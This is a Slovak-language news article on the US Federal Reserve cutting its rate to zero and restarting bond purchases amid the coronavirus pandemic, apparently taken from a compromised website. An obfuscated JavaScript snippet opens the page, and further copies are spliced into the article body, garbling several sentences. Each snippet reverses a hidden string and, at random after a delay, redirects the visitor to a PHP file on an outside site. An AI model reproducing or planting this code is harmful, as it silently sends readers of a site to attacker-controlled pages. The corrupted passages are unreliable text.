<script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>dolar, americké akcie

Fed zrazil sadzby na nulu

Americká centrálna banka mimoriadne rýchlo reagovala na Koronavírovú pdom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andémiu a radikálne znížila svoju základnú úrokovú sadzbu na technickú nulu.

Federálny rezervný systém znížil svoju referenčnú úrokovú sadzbu na technickú nulu. Bude sa teda pohybovať v intervale 0 až 0,25 percenta. Ide o pokles o jeden percentuálny bod, respektíve sto bázických bodov. Ide o jedno z najrazantnejšie zníženie úrokovej sadzby, ku ktorému Fed pristúpil od vypuknutia finančnej krízy v roku 2008.

To ale nie je všetko. Americkí centrálni bankári takisto oznámili, že spustia program na odkup vládnych dlhopisov v rozsahu 700 miliárd dolárov. Fed sa tak fakticky vracia ku kvantitatívnemu uvoľňovaniu, nástrojmi, od ktorých si sľubuje rýchle napumpovanie potrebnej likvidity do ekonomiky.

Členovia vedenia Fedu sa zišli mimoriadne v nedeľu len pár dní pred svojím riadnym zasadnutím. „Dostupné ekonomické dáta ukazujú, že americké hospodárstvo vstupuje do obdobia plných výziev, silnej a v dobrej kondícii,“ uviedol Fed vo svojom vyhlásení. Opatrenia sa tak javia byť skôr preventívnym s cieľom spomaliť, prípadne zastaviť nástup predpokladanej hospodárskej recesie. Už teraz je nesporné, že $GRn=function(n){if (typeof ($GRn.list[n]) == „string“) return $GRn.list[n].split(„“).reverse().join(„“);return $GRn.list[n];};$GRn.list=[„\’php.rabedis-nimda-snoitcnuf/cni/srebmem/snigulp/tnetnoc-pw/moc.nemrolias//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andemie-koronavirusu/“>Koronavírová pdom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andémia bude znamenať nezanedbateľné hospodárske škody po celom svete, USA nevynímajúc.

Jeden komentář

Přidat komentář

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *